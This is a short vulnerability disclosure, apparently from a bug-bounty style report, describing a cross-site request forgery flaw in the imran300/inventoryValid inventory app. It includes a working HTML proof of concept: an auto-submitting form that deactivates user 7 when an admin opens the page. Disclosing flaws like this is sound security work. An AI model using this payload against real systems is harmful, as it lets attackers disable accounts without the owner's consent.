Cross-Site Request Forgery (CSRF) in imran300/inventoryValid
Sep 4th 2021
You didn't set any CSRF protection for deactivating a user.
🕵️♂️ Proof of Concept
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/inventory/index.php/Users/deactiveStatus/7"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
After that admin open the PoC.html file the user with id 7 will be deactivated.
This vulnerability is capable of deactivate any user with on click.